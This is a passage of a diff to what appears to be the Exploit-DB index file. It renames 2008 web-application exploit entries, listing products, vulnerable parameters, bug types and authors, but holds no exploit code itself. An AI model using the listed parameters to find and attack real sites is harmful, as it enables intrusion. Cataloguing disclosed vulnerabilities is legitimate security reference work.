2.3.3-beta0 - 'album' Parameter Local File Inclusion",2008-10-19,Vrs-hCk,php,webapps,0 +6788,platforms/php/webapps/6788.txt,"Yappa-ng 2.3.3-beta0 - 'album' Local File Inclusion",2008-10-19,Vrs-hCk,php,webapps,0 6789,platforms/php/webapps/6789.pl,"Vivvo CMS 3.4 - Multiple Vulnerabilities",2008-10-19,Xianur0,php,webapps,0 -6790,platforms/php/webapps/6790.py,"WBB Plugin rGallery 1.09 - 'itemID' Parameter Blind SQL Injection",2008-10-20,Five-Three-Nine,php,webapps,0 +6790,platforms/php/webapps/6790.py,"WBB Plugin rGallery 1.09 - 'itemID' Blind SQL Injection",2008-10-20,Five-Three-Nine,php,webapps,0 6791,platforms/php/webapps/6791.pl,"e107 < 0.7.13 - 'usersettings.php' Blind SQL Injection",2008-10-19,girex,php,webapps,0 -6792,platforms/php/webapps/6792.txt,"Joomla! Component ds-syndicate - 'feed_id' Parameter SQL Injection",2008-10-20,boom3rang,php,webapps,0 +6792,platforms/php/webapps/6792.txt,"Joomla! Component ds-syndicate - 'feed_id' SQL Injection",2008-10-20,boom3rang,php,webapps,0 6795,platforms/php/webapps/6795.txt,"XOOPS Module makale 0.26 - SQL Injection",2008-10-20,EcHoLL,php,webapps,0 6796,platforms/php/webapps/6796.txt,"Limbo CMS - (Private Messaging Component) SQL Injection",2008-10-21,StAkeR,php,webapps,0 6797,platforms/php/webapps/6797.txt,"LightBlog 9.8 - (GET & POST & COOKIE) Multiple Local File Inclusion Vulnerabilities",2008-10-21,JosS,php,webapps,0 -6799,platforms/php/webapps/6799.txt,"ShopMaker CMS 1.0 - 'id' Parameter SQL Injection",2008-10-21,"Hussin X",php,webapps,0 -6802,platforms/php/webapps/6802.txt,"Joomla! Component Daily Message 1.0.3 - 'id' Parameter SQL Injection",2008-10-22,H!tm@N,php,webapps,0 +6799,platforms/php/webapps/6799.txt,"ShopMaker CMS 1.0 - 'id' SQL Injection",2008-10-21,"Hussin X",php,webapps,0 +6802,platforms/php/webapps/6802.txt,"Joomla! Component Daily Message 1.0.3 - 'id' SQL Injection",2008-10-22,H!tm@N,php,webapps,0 6803,platforms/php/webapps/6803.txt,"Iamma Simple Gallery 1.0/2.0 - Arbitrary File Upload",2008-10-22,x0r,php,webapps,0 -6806,platforms/php/webapps/6806.txt,"phpcrs 2.06 - 'importFunction' Parameter Local File Inclusion",2008-10-22,Pepelux,php,webapps,0 +6806,platforms/php/webapps/6806.txt,"phpcrs 2.06 - 'importFunction' Local File Inclusion",2008-10-22,Pepelux,php,webapps,0 6808,platforms/php/webapps/6808.pl,"LoudBlog 0.8.0a - 'ajax.php' SQL Injection",2008-10-22,Xianur0,php,webapps,0 6809,platforms/php/webapps/6809.txt,"Joomla! Component ionFiles 4.4.2 - File Disclosure",2008-10-22,Vrs-hCk,php,webapps,0 6810,platforms/asp/webapps/6810.txt,"DorsaCMS - 'ShowPage.aspx' SQL Injection",2008-10-22,syst3m_f4ult,asp,webapps,0 -6811,platforms/php/webapps/6811.txt,"YDC - 'cat' Parameter SQL Injection",2008-10-22,"Hussin X",php,webapps,0 +6811,platforms/php/webapps/6811.txt,"YDC - 'cat' SQL Injection",2008-10-22,"Hussin X",php,webapps,0 6814,platforms/php/webapps/6814.php,"CSPartner 1.0 - (Delete All Users / SQL Injection) Remote Exploit",2008-10-23,StAkeR,php,webapps,0 -6816,platforms/php/webapps/6816.txt,"txtshop 1.0b (Windows) - 'Language' Parameter Local File Inclusion",2008-10-23,Pepelux,php,webapps,0 +6816,platforms/php/webapps/6816.txt,"txtshop 1.0b (Windows) - 'Language' Local File Inclusion",2008-10-23,Pepelux,php,webapps,0 6817,platforms/php/webapps/6817.txt,"Joomla! Component RWCards 3.0.11 - Local File Inclusion",2008-10-23,Vrs-hCk,php,webapps,0 6818,platforms/php/webapps/6818.txt,"aflog 1.01 - Multiple Insecure Cookie Handling Vulnerabilities",2008-10-23,JosS,php,webapps,0 6819,platforms/php/webapps/6819.txt,"MindDezign Photo Gallery 2.2 - SQL Injection",2008-10-23,"CWH Underground",php,webapps,0 @@ -20496,10 +20497,10 @@ id,file,description,date,author,platform,type,port 6823,platforms/php/webapps/6823.txt,"SiteEngine 5.x - Multiple Vulnerabilities",2008-10-23,xy7,php,webapps,0 6826,platforms/php/webapps/6826.txt,"Joomla! Component archaic binary Gallery 0.2 - Directory Traversal",2008-10-24,H!tm@N,php,webapps,0 6827,platforms/php/webapps/6827.txt,"Joomla! Component Kbase 1.0 - SQL Injection",2008-10-24,H!tm@N,php,webapps,0 -6829,platforms/php/webapps/6829.txt,"Aj RSS Reader - 'url' Parameter SQL Injection",2008-10-24,yassine_enp,php,webapps,0 +6829,platforms/php/webapps/6829.txt,"Aj RSS Reader - 'url' SQL Injection",2008-10-24,yassine_enp,php,webapps,0 6830,platforms/php/webapps/6830.txt,"NEPT Image Uploader 1.0 - Arbitrary File Upload",2008-10-24,Dentrasi,php,webapps,0 6833,platforms/php/webapps/6833.txt,"phpdaily - SQL Injection / Cross-Site Scripting / Local File Download",2008-10-24,0xFFFFFF,php,webapps,0 -6835,platforms/php/webapps/6835.txt,"BuzzyWall 1.3.1 - 'id' Parameter Remote File Disclosure",2008-10-24,b3hz4d,php,webapps,0 +6835,platforms/php/webapps/6835.txt,"BuzzyWall 1.3.1 - 'id' Remote File Disclosure",2008-10-24,b3hz4d,php,webapps,0 6836,platforms/php/webapps/6836.txt,"Tlnews 2.2 - Insecure Cookie Handling",2008-10-25,x0r,php,webapps,0 6837,platforms/php/webapps/6837.txt,"Kasra CMS - 'index.php' Multiple SQL Injections",2008-10-25,G4N0K,php,webapps,0 6839,platforms/php/webapps/6839.txt,"PozScripts Classified Auctions - 'gotourl.php id' SQL Injection",2008-10-26,"Hussin X",php,webapps,0 @@ -20507,19 +20508,19 @@ id,file,description,date,author,platform,type,port 6843,platforms/php/webapps/6843.txt,"SFS Ez Forum - SQL Injection",2008-10-26,Hurley,php,webapps,0 6844,platforms/php/webapps/6844.pl,"MyForum 1.3 - 'lecture.php' SQL Injection",2008-10-26,Vrs-hCk,php,webapps,0 6845,platforms/cgi/webapps/6845.txt,"Ads Pro - 'dhtml.pl' Remote Command Execution",2008-10-26,S0l1D,cgi,webapps,0 -6846,platforms/php/webapps/6846.txt,"MyForum 1.3 - 'padmin' Parameter Local File Inclusion",2008-10-27,Vrs-hCk,php,webapps,0 +6846,platforms/php/webapps/6846.txt,"MyForum 1.3 - 'padmin' Local File Inclusion",2008-10-27,Vrs-hCk,php,webapps,0 6847,platforms/php/webapps/6847.txt,"Persia BME E-Catalogue - SQL Injection",2008-10-27,BugReport.IR,php,webapps,0 6848,platforms/php/webapps/6848.txt,"TlAds 1.0 - Remote Insecure Cookie Handling",2008-10-27,x0r,php,webapps,0 -6849,platforms/php/webapps/6849.txt,"e107 Plugin alternate_profiles - 'id' Parameter SQL Injection",2008-10-27,boom3rang,php,webapps,0 -6850,platforms/php/webapps/6850.txt,"MyKtools 2.4 - 'langage' Parameter Local File Inclusion",2008-10-27,x0r,php,webapps,0 -6852,platforms/php/webapps/6852.pl,"e107 Plugin EasyShop - 'category_id' Parameter Blind SQL Injection",2008-10-27,StAkeR,php,webapps,0 +6849,platforms/php/webapps/6849.txt,"e107 Plugin alternate_profiles - 'id' SQL Injection",2008-10-27,boom3rang,php,webapps,0 +6850,platforms/php/webapps/6850.txt,"MyKtools 2.4 - 'langage' Local File Inclusion",2008-10-27,x0r,php,webapps,0 +6852,platforms/php/webapps/6852.pl,"e107 Plugin EasyShop - 'category_id' Blind SQL Injection",2008-10-27,StAkeR,php,webapps,0 6853,platforms/php/webapps/6853.txt,"QuestCMS - Cross-Site Scripting / Directory Traversal / SQL Injection",2008-10-27,d3b4g,php,webapps,0 -6854,platforms/php/webapps/6854.txt,"AIOCP 1.4 - 'poll_id' Parameter SQL Injection",2008-10-27,ExSploiters,php,webapps,0 +6854,platforms/php/webapps/6854.txt,"AIOCP 1.4 - 'poll_id' SQL Injection",2008-10-27,ExSploiters,php,webapps,0 6855,platforms/php/webapps/6855.txt,"MyKtools 2.4 - Arbitrary Database Backup",2008-10-27,Stack,php,webapps,0 6856,platforms/php/webapps/6856.txt,"e107 Plugin BLOG Engine 2.1.4 - SQL Injection",2008-10-28,ZoRLu,php,webapps,0 6857,platforms/php/webapps/6857.txt,"MyForum 1.3 - Insecure Cookie Handling",2008-10-28,Stack,php,webapps,0 -6858,platforms/php/webapps/6858.txt,"PersianBB - 'id' Parameter SQL Injection",2008-10-28,"Hussin X",php,webapps,0 -6859,platforms/php/webapps/6859.txt,"Agares ThemeSiteScript 1.0 - 'loadadminpage' Parameter Remote File Inclusion",2008-10-28,DaRkLiFe,php,webapps,0 +6858,platforms/php/webapps/6858.txt,"PersianBB - 'id' SQL Injection",2008-10-28,"Hussin X",php,webapps,0 +6859,platforms/php/webapps/6859.txt,"Agares ThemeSiteScript 1.0 - 'loadadminpage' Remote File Inclusion",2008-10-28,DaRkLiFe,php,webapps,0 6860,platforms/php/webapps/6860.txt,"TlGuestBook 1.2 - Insecure Cookie Handling",2008-10-28,x0r,php,webapps,0 6861,platforms/php/webapps/6861.pl,"H2O-CMS 3.4 - Remote Command Execution (mq = off)",2008-10-28,StAkeR,php,webapps,0 6862,platforms/php/webapps/6862.txt,"H2O-CMS 3.4 - Insecure Cookie Handling",2008-10-29,Stack,php,webapps,0 @@ -20536,7 +20537,7 @@ id,file,description,date,author,platform,type,port 6881,platforms/php/webapps/6881.txt,"Absolute File Send 1.0 - Remote Cookie Handling",2008-10-30,Hakxer,php,webapps,0 6882,platforms/php/webapps/6882.txt,"Absolute Podcast 1.0 - Remote Insecure Cookie Handling",2008-10-30,Hakxer,php,webapps,0 6883,platforms/php/webapps/6883.txt,"Absolute Poll Manager XE 4.1 - Cookie Handling",2008-10-30,Hakxer,php,webapps,0 -6885,platforms/php/webapps/6885.txt,"e107 Plugin lyrics_menu - 'l_id' Parameter SQL Injection",2008-10-31,ZoRLu,php,webapps,0 +6885,platforms/php/webapps/6885.txt,"e107 Plugin lyrics_menu - 'l_id' SQL Injection",2008-10-31,ZoRLu,php,webapps,0 6886,platforms/php/webapps/6886.txt,"Tribiq CMS 5.0.9a (Beta) - Insecure Cookie Handling",2008-10-31,ZoRLu,php,webapps,0 6887,platforms/php/webapps/6887.txt,"Cybershade CMS 0.2b - Remote File Inclusion",2008-10-31,w0cker,php,webapps,0 6888,platforms/php/webapps/6888.txt,"Tribiq CMS 5.0.10a (Windows) - Local File Inclusion",2008-10-31,GoLd_M,php,webapps,0 @@ -20547,31 +20548,31 @@ id,file,description,date,author,platform,type,port 6893,platforms/php/webapps/6893.txt,"Absolute Control Panel XE 1.5 - Insecure Cookie Handling",2008-10-31,Hakxer,php,webapps,0 6894,platforms/php/webapps/6894.txt,"SFS EZ Gaming Directory - 'directory.php' SQL Injection",2008-10-31,Hurley,php,webapps,0 6895,platforms/php/webapps/6895.txt,"SFS EZ Adult Directory - 'directory.php' SQL Injection",2008-10-31,Hurley,php,webapps,0 -6896,platforms/php/webapps/6896.txt,"Logz podcast CMS 1.3.1 - 'art' Parameter SQL Injection",2008-10-31,ZoRLu,php,webapps,0 +6896,platforms/php/webapps/6896.txt,"Logz podcast CMS 1.3.1 - 'art' SQL Injection",2008-10-31,ZoRLu,php,webapps,0 6897,platforms/php/webapps/6897.txt,"cPanel 11.x - Cross-Site Scripting / Local File Inclusion",2008-10-31,"Khashayar Fereidani",php,webapps,0 6898,platforms/php/webapps/6898.txt,"U-Mail Webmail 4.91 - 'edit.php' Arbitrary File Write",2008-10-31,"Shennan Wang",php,webapps,0 6900,platforms/php/webapps/6900.txt,"Absolute News Manager 5.1 - Insecure Cookie Handling",2008-10-31,Hakxer,php,webapps,0 6901,platforms/php/webapps/6901.txt,"Absolute News Feed 1.0 - Remote Insecure Cookie Handling",2008-10-31,Hakxer,php,webapps,0 6902,platforms/php/webapps/6902.txt,"Absolute FAQ Manager 6.0 - Insecure Cookie Handling",2008-10-31,Hakxer,php,webapps,0 -6903,platforms/php/webapps/6903.txt,"SFS EZ HotScripts-like Site - 'cid' Parameter SQL Injection",2008-10-31,TR-ShaRk,php,webapps,0 +6903,platforms/php/webapps/6903.txt,"SFS EZ HotScripts-like Site - 'cid' SQL Injection",2008-10-31,TR-ShaRk,php,webapps,0 6904,platforms/php/webapps/6904.txt,"Absolute NewsLetter 6.1 - Insecure Cookie Handling",2008-10-31,x0r,php,webapps,0 -6905,platforms/php/webapps/6905.txt,"SFS EZ Hosting Directory - 'cat_id' Parameter SQL Injection",2008-10-31,BeyazKurt,php,webapps,0 -6906,platforms/php/webapps/6906.txt,"SFS EZ Gaming Directory - 'cat_id' Parameter SQL Injection",2008-10-31,BeyazKurt,php,webapps,0 -6907,platforms/php/webapps/6907.txt,"SFS EZ Home Business Directory - 'cat_id' Parameter SQL Injection",2008-10-31,BeyazKurt,php,webapps,0 -6908,platforms/php/webapps/6908.txt,"SFS EZ Link Directory - 'cat_id' Parameter SQL Injection",2008-10-31,BeyazKurt,php,webapps,0 -6909,platforms/php/webapps/6909.txt,"Adult Banner Exchange Website - 'targetid' Parameter SQL Injection",2008-10-31,"Hussin X",php,webapps,0 +6905,platforms/php/webapps/6905.txt,"SFS EZ Hosting Directory - 'cat_id' SQL Injection",2008-10-31,BeyazKurt,php,webapps,0 +6906,platforms/php/webapps/6906.txt,"SFS EZ Gaming Directory - 'cat_id' SQL Injection",2008-10-31,BeyazKurt,php,webapps,0 +6907,platforms/php/webapps/6907.txt,"SFS EZ Home Business Directory - 'cat_id' SQL Injection",2008-10-31,BeyazKurt,php,webapps,0 +6908,platforms/php/webapps/6908.txt,"SFS EZ Link Directory - 'cat_id' SQL Injection",2008-10-31,BeyazKurt,php,webapps,0 +6909,platforms/php/webapps/6909.txt,"Adult Banner Exchange Website - 'targetid' SQL Injection",2008-10-31,"Hussin X",php,webapps,0 6910,platforms/php/webapps/6910.txt,"SFS EZ BIZ PRO - SQL Injection",2008-10-31,"Hussin X",php,webapps,0 -6911,platforms/php/webapps/6911.txt,"SFS EZ Affiliate - 'cat_id' Parameter SQL Injection",2008-10-31,d3b4g,php,webapps,0 +6911,platforms/php/webapps/6911.txt,"SFS EZ Affiliate - 'cat_id' SQL Injection",2008-10-31,d3b4g,php,webapps,0 6912,platforms/php/webapps/6912.txt,"Article Publisher PRO 1.5 - Authentication Bypass",2008-10-31,Hakxer,php,webapps,0 -6913,platforms/php/webapps/6913.txt,"SFS EZ Webring - 'cat' Parameter SQL Injection",2008-10-31,d3b4g,php,webapps,0 -6914,platforms/php/webapps/6914.txt,"SFS EZ Hot or Not - 'phid' Parameter SQL Injection",2008-10-31,d3b4g,php,webapps,0 -6915,platforms/php/webapps/6915.txt,"SFS EZ Software - 'id' Parameter SQL Injection",2008-10-31,x0r,php,webapps,0 +6913,platforms/php/webapps/6913.txt,"SFS EZ Webring - 'cat' SQL Injection",2008-10-31,d3b4g,php,webapps,0 +6914,platforms/php/webapps/6914.txt,"SFS EZ Hot or Not - 'phid' SQL Injection",2008-10-31,d3b4g,php,webapps,0 +6915,platforms/php/webapps/6915.txt,"SFS EZ Software - 'id' SQL Injection",2008-10-31,x0r,php,webapps,0 6916,platforms/php/webapps/6916.txt,"ModernBill 4.4.x - Cross-Site Scripting / Remote File Inclusion",2008-10-31,nigh7f411,php,webapps,0 -6917,platforms/php/webapps/6917.php,"Article Publisher PRO - 'userid' Parameter SQL Injection",2008-10-31,Stack,php,webapps,0 +6917,platforms/php/webapps/6917.php,"Article Publisher PRO - 'userid' SQL Injection",2008-10-31,Stack,php,webapps,0 6918,platforms/php/webapps/6918.txt,"SFS EZ Auction - Blind SQL Injection",2008-10-31,Stack,php,webapps,0 6919,platforms/php/webapps/6919.txt,"SFS EZ Career - SQL Injection",2008-10-31,Stack,php,webapps,0 6920,platforms/php/webapps/6920.txt,"SFS EZ Top Sites - SQL Injection",2008-10-31,Stack,php,webapps,0 -6922,platforms/php/webapps/6922.txt,"SFS EZ Webstore - 'where' Parameter SQL Injection",2008-11-01,ZoRLu,php,webapps,0 +6922,platforms/php/webapps/6922.txt,"SFS EZ Webstore - 'where' SQL Injection",2008-11-01,ZoRLu,php,webapps,0 6923,platforms/php/webapps/6923.txt,"SFS EZ Pub Site - SQL Injection",2008-11-01,Hakxer,php,webapps,0 6924,platforms/php/webapps/6924.txt,"SFS EZ Gaming Cheats - SQL Injection",2008-11-01,ZoRLu,php,webapps,0 6925,platforms/php/webapps/6925.txt,"Bloggie Lite 0.0.2 Beta - SQL Injection by Insecure Cookie Handling",2008-11-01,JosS,php,webapps,0 @@ -20608,7 +20609,7 @@ id,file,description,date,author,platform,type,port 6958,platforms/php/webapps/6958.txt,"Maran PHP Shop - 'prodshow.php' SQL Injection",2008-11-02,d3v1l,php,webapps,0 6960,platforms/php/webapps/6960.txt,"1st News - SQL Injection",2008-11-02,TR-ShaRk,php,webapps,0 6961,platforms/php/webapps/6961.pl,"DZCP (deV!L_z Clanportal) 1.4.9.6 - Blind SQL Injection",2008-11-02,anonymous,php,webapps,0 -6962,platforms/php/webapps/6962.txt,"BosClassifieds - 'cat_id' Parameter SQL Injection",2008-11-03,ZoRLu,php,webapps,0 +6962,platforms/php/webapps/6962.txt,"BosClassifieds - 'cat_id' SQL Injection",2008-11-03,ZoRLu,php,webapps,0 6964,platforms/php/webapps/6964.txt,"Acc Real Estate 4.0 - Insecure Cookie Handling",2008-11-03,Hakxer,php,webapps,0 6965,platforms/php/webapps/6965.txt,"Acc Statistics 1.1 - Insecure Cookie Handling",2008-11-03,Hakxer,php,webapps,0 6966,platforms/php/webapps/6966.txt,"Acc PHP eMail 1.1 - Insecure Cookie Handling",2008-11-03,Hakxer,php,webapps,0 @@ -20621,11 +20622,11 @@ id,file,description,date,author,platform,type,port 6974,platforms/php/webapps/6974.txt,"WEBBDOMAIN WebShop 1.02 - SQL Injection / Cross-Site Scripting",2008-11-04,G4N0K,php,webapps,0 6975,platforms/php/webapps/6975.txt,"Joomla! Component VirtueMart Google Base 1.1 - Remote File Inclusion",2008-11-04,NoGe,php,webapps,0 6976,platforms/php/webapps/6976.txt,"Joomla! Component ongumatimesheet20 4b - Remote File Inclusion",2008-11-04,NoGe,php,webapps,0 -6977,platforms/php/webapps/6977.txt,"WEBBDOMAIN Post Card 1.02 - 'catid' Parameter SQL Injection",2008-11-04,"Hussin X",php,webapps,0 +6977,platforms/php/webapps/6977.txt,"WEBBDOMAIN Post Card 1.02 - 'catid' SQL Injection",2008-11-04,"Hussin X",php,webapps,0 6978,platforms/php/webapps/6978.txt,"Vibro-CMS - Multiple SQL Injections",2008-11-04,StAkeR,php,webapps,0 6979,platforms/php/webapps/6979.txt,"nicLOR Puglia Landscape - Local File Inclusion",2008-11-04,StAkeR,php,webapps,0 6980,platforms/php/webapps/6980.txt,"Joomla! Component ProDesk 1.0/1.2 - Local File Inclusion",2008-11-04,d3v1l,php,webapps,0 -6981,platforms/php/webapps/6981.txt,"Vibro-School-CMS - 'nID' Parameter SQL Injection",2008-11-04,Cyber-Zone,php,webapps,0 +6981,platforms/php/webapps/6981.txt,"Vibro-School-CMS - 'nID' SQL Injection",2008-11-04,Cyber-Zone,php,webapps,0 6982,platforms/php/webapps/6982.txt,"CMS-School 2005 - 'showarticle.php' SQL Injection",2008-11-04,Cyber-Zone,php,webapps,0 6983,platforms/php/webapps/6983.txt,"WEBBDOMAIN Petition 1.02/2.0/3.0 - Authentication Bypass",2008-11-04,Hakxer,php,webapps,0 6984,platforms/php/webapps/6984.txt,"WEBBDOMAIN Polls 1.01 - Authentication Bypass",2008-11-04,Hakxer,php,webapps,0 @@ -20639,17 +20640,17 @@ id,file,description,date,author,platform,type,port 6992,platforms/php/webapps/6992.txt,"wotw 5.0 - Local/Remote File Inclusion",2008-11-04,dun,php,webapps,0 6993,platforms/php/webapps/6993.php,"Simple Machines Forum (SMF) 1.1.6 - Code Execution",2008-11-04,"Charles Fol",php,webapps,0 6995,platforms/php/webapps/6995.txt,"phpBB Mod Small ShoutBox 1.4 - Remote Edit/Delete Messages",2008-11-05,StAkeR,php,webapps,0 -6996,platforms/php/webapps/6996.php,"PHPX 3.5.16 - 'news_id' Parameter SQL Injection",2008-11-05,StAkeR,php,webapps,0 +6996,platforms/php/webapps/6996.php,"PHPX 3.5.16 - 'news_id' SQL Injection",2008-11-05,StAkeR,php,webapps,0 6997,platforms/php/webapps/6997.txt,"Pre Podcast Portal - SQL Injection",2008-11-05,G4N0K,php,webapps,0 6998,platforms/php/webapps/6998.txt,"Pre Shopping Mall - Insecure Cookie Handling",2008-11-05,G4N0K,php,webapps,0 6999,platforms/php/webapps/6999.txt,"PreProject Multi-Vendor Shopping Malls - Multiple Vulnerabilities",2008-11-05,G4N0K,php,webapps,0 7000,platforms/php/webapps/7000.txt,"Pre Classified Listings - Insecure Cookie Handling",2008-11-05,G4N0K,php,webapps,0 7001,platforms/php/webapps/7001.txt,"DFLabs PTK 1.0 - Local Command Execution",2008-11-05,ikki,php,webapps,0 7002,platforms/php/webapps/7002.txt,"Joomla! Component Dada Mail Manager 2.6 - Remote File Inclusion",2008-11-05,NoGe,php,webapps,0 -7003,platforms/php/webapps/7003.txt,"PHP Auto Listings - 'pg' Parameter SQL Injection",2008-11-05,G4N0K,php,webapps,0 +7003,platforms/php/webapps/7003.txt,"PHP Auto Listings - 'pg' SQL Injection",2008-11-05,G4N0K,php,webapps,0 7004,platforms/php/webapps/7004.txt,"Pre Simple CMS - Authentication Bypass",2008-11-05,"Hussin X",php,webapps,0 7005,platforms/php/webapps/7005.txt,"PHP JOBWEBSITE PRO - Authentication Bypass",2008-11-05,Cyber-Zone,php,webapps,0 -7007,platforms/php/webapps/7007.txt,"Harlandscripts drinks - 'recid' Parameter SQL Injection",2008-11-05,"Ex Tacy",php,webapps,0 +7007,platforms/php/webapps/7007.txt,"Harlandscripts drinks - 'recid' SQL Injection",2008-11-05,"Ex Tacy",php,webapps,0 7008,platforms/php/webapps/7008.txt,"Pre Real Estate Listings - Authentication Bypass",2008-11-05,Cyber-Zone,php,webapps,0 7009,platforms/php/webapps/7009.txt,"Mole Group Airline Ticket Script - SQL Injection",2008-11-05,InjEctOr5,php,webapps,0 7010,platforms/php/webapps/7010.txt,"Mole Group Taxi Calc Dist Script - Authentication Bypass",2008-11-05,InjEctOr5,php,webapps,0 @@ -20668,19 +20669,19 @@ id,file,description,date,author,platform,type,port 7023,platforms/php/webapps/7023.txt,"DELTAScripts PHP Classifieds 7.5 - Authentication Bypass",2008-11-06,ZoRLu,php,webapps,0 7024,platforms/php/webapps/7024.txt,"DELTAScripts PHP Links 1.3 - Authentication Bypass",2008-11-06,ZoRLu,php,webapps,0 7025,platforms/php/webapps/7025.txt,"DELTAScripts PHP Shop 1.0 - Authentication Bypass",2008-11-06,ZoRLu,php,webapps,0 -7026,platforms/php/webapps/7026.txt,"SoftComplex PHP Image Gallery - 'ctg' Parameter SQL Injection",2008-11-06,"Hussin X",php,webapps,0 +7026,platforms/php/webapps/7026.txt,"SoftComplex PHP Image Gallery - 'ctg' SQL Injection",2008-11-06,"Hussin X",php,webapps,0 7027,platforms/php/webapps/7027.txt,"Prozilla Software Directory - Cross-Site Scripting / SQL Injection",2008-11-06,G4N0K,php,webapps,0 7028,platforms/php/webapps/7028.txt,"TurnkeyForms Entertainment Portal 2.0 - Insecure Cookie Handling",2008-11-07,G4N0K,php,webapps,0 -7029,platforms/php/webapps/7029.txt,"TurnkeyForms Business Survey Pro 1.0 - 'id' Parameter SQL Injection",2008-11-07,G4N0K,php,webapps,0 -7030,platforms/php/webapps/7030.txt,"Mole Group Pizza - 'manufacturers_id' Parameter SQL Injection",2008-11-07,InjEctOr5,php,webapps,0 -7031,platforms/php/webapps/7031.php,"e-Vision CMS 2.0.2 - Multiple Local File Inclusion",2008-11-07,StAkeR,php,webapps,0 +7029,platforms/php/webapps/7029.txt,"TurnkeyForms Business Survey Pro 1.0 - 'id' SQL Injection",2008-11-07,G4N0K,php,webapps,0 +7030,platforms/php/webapps/7030.txt,"Mole Group Pizza - 'manufacturers_id' SQL Injection",2008-11-07,InjEctOr5,php,webapps,0 +7031,platforms/php/webapps/7031.php,"e-Vision CMS 2.0.2 - Multiple Local File Inclusions",2008-11-07,StAkeR,php,webapps,0 7032,platforms/php/webapps/7032.txt,"U&M Software Signup 1.1 - Authentication Bypass",2008-11-07,G4N0K,php,webapps,0 7033,platforms/php/webapps/7033.txt,"U&M Software JustBookIt 1.0 - Authentication Bypass",2008-11-07,G4N0K,php,webapps,0 7034,platforms/php/webapps/7034.txt,"U&M Software Event Lister 1.0 - Authentication Bypass",2008-11-07,G4N0K,php,webapps,0 7035,platforms/php/webapps/7035.txt,"TurnkeyForms Local Classifieds - Cross-Site Scripting / SQL Injection",2008-11-07,TR-ShaRk,php,webapps,0 -7038,platforms/php/webapps/7038.txt,"Joomla! Component ClickHeat 1.0.1 - Multiple Remote File Inclusion",2008-11-07,NoGe,php,webapps,0 -7039,platforms/php/webapps/7039.txt,"Joomla! Component Recly!Competitions 1.0.0 - Multiple Remote File Inclusion",2008-11-07,NoGe,php,webapps,0 -7040,platforms/php/webapps/7040.txt,"Joomla! Component Feederator 1.0.5 - Multiple Remote File Inclusion",2008-11-07,NoGe,php,webapps,0 +7038,platforms/php/webapps/7038.txt,"Joomla! Component ClickHeat 1.0.1 - Multiple Remote File Inclusions",2008-11-07,NoGe,php,webapps,0 +7039,platforms/php/webapps/7039.txt,"Joomla! Component Recly!Competitions 1.0.0 - Multiple Remote File Inclusions",2008-11-07,NoGe,php,webapps,0 +7040,platforms/php/webapps/7040.txt,"Joomla! Component Feederator 1.0.5 - Multiple Remote File Inclusions",2008-11-07,NoGe,php,webapps,0 7041,platforms/php/webapps/7041.txt,"E-topbiz Online Store 1 - Authentication Bypass",2008-11-07,ZoRLu,php,webapps,0 7042,platforms/php/webapps/7042.txt,"PHP Auto Listings Script - Authentication Bypass",2008-11-07,r45c4l,php,webapps,0 7043,platforms/php/webapps/7043.txt,"Mole Group Rental Script - Authentication Bypass",2008-11-07,Cyber-Zone,php,webapps,0 @@ -20688,31 +20689,31 @@ id,file,description,date,author,platform,type,port 7045,platforms/php/webapps/7045.txt,"MyioSoft EasyBookMarker 4.0 - Authentication Bypass",2008-11-07,ZoRLu,php,webapps,0 7046,platforms/php/webapps/7046.txt,"MyioSoft EasyCalendar - Authentication Bypass",2008-11-07,ZoRLu,php,webapps,0 7047,platforms/php/webapps/7047.txt,"DELTAScripts PHP Classifieds 7.5 - SQL Injection",2008-11-07,ZoRLu,php,webapps,0 -7048,platforms/php/webapps/7048.txt,"E-topbiz Online Store 1 - 'cat_id' Parameter SQL Injection",2008-11-07,Stack,php,webapps,0 +7048,platforms/php/webapps/7048.txt,"E-topbiz Online Store 1 - 'cat_id' SQL Injection",2008-11-07,Stack,php,webapps,0 7049,platforms/php/webapps/7049.txt,"Mini Web Calendar 1.2 - File Disclosure / Cross-Site Scripting",2008-11-07,ahmadbady,php,webapps,0 7050,platforms/php/webapps/7050.txt,"E-topbiz Number Links 1 - 'id' SQL Injection",2008-11-07,"Hussin X",php,webapps,0 7052,platforms/php/webapps/7052.txt,"Domain Seller Pro 1.5 - 'id' SQL Injection",2008-11-07,TR-ShaRk,php,webapps,0 -7053,platforms/php/webapps/7053.txt,"Myiosoft EasyBookMarker 4 - 'Parent' Parameter SQL Injection",2008-11-07,G4N0K,php,webapps,0 +7053,platforms/php/webapps/7053.txt,"Myiosoft EasyBookMarker 4 - 'Parent' SQL Injection",2008-11-07,G4N0K,php,webapps,0 7057,platforms/php/webapps/7057.pl,"MemHT Portal 4.0 - Remote Code Execution",2008-11-08,Ams,php,webapps,0 7058,platforms/php/webapps/7058.txt,"zeeproperty 1.0 - Arbitrary File Upload / Cross-Site Scripting",2008-11-08,ZoRLu,php,webapps,0 7059,platforms/php/webapps/7059.txt,"Enthusiast 3.1.4 - 'show_joined.php' Remote File Inclusion",2008-11-08,BugReport.IR,php,webapps,0 7061,platforms/php/webapps/7061.txt,"V3 Chat Profiles/Dating Script 3.0.2 - Authentication Bypass",2008-11-08,d3b4g,php,webapps,0 7062,platforms/php/webapps/7062.txt,"Zeeways ZeeJobsite 2.0 - Arbitrary File Upload",2008-11-08,ZoRLu,php,webapps,0 7063,platforms/php/webapps/7063.txt,"V3 Chat Profiles/Dating Script 3.0.2 - Insecure Cookie Handling",2008-11-08,Stack,php,webapps,0 -7064,platforms/php/webapps/7064.pl,"Mambo Component n-form - 'form_id' Parameter Blind SQL Injection",2008-11-08,boom3rang,php,webapps,0 -7065,platforms/php/webapps/7065.txt,"Cyberfolio 7.12.2 - 'theme' Parameter Local File Inclusion",2008-11-08,dun,php,webapps,0 +7064,platforms/php/webapps/7064.pl,"Mambo Component n-form - 'form_id' Blind SQL Injection",2008-11-08,boom3rang,php,webapps,0 +7065,platforms/php/webapps/7065.txt,"Cyberfolio 7.12.2 - 'theme' Local File Inclusion",2008-11-08,dun,php,webapps,0 7066,platforms/php/webapps/7066.txt,"Zeeways Shaadi Clone 2.0 - Authentication Bypass (1)",2008-11-08,G4N0K,php,webapps,0 7067,platforms/asp/webapps/7067.txt,"DigiAffiliate 1.4 - Authentication Bypass",2008-11-08,d3b4g,asp,webapps,0 7068,platforms/php/webapps/7068.txt,"Mole Group Airline Ticket Script - Authentication Bypass",2008-11-08,Cyber-Zone,php,webapps,0 7069,platforms/php/webapps/7069.txt,"V3 Chat Live Support 3.0.4 - Insecure Cookie Handling",2008-11-08,Cyber-Zone,php,webapps,0 7070,platforms/php/webapps/7070.txt,"Zeeways PHOTOVIDEOTUBE 1.1 - Authentication 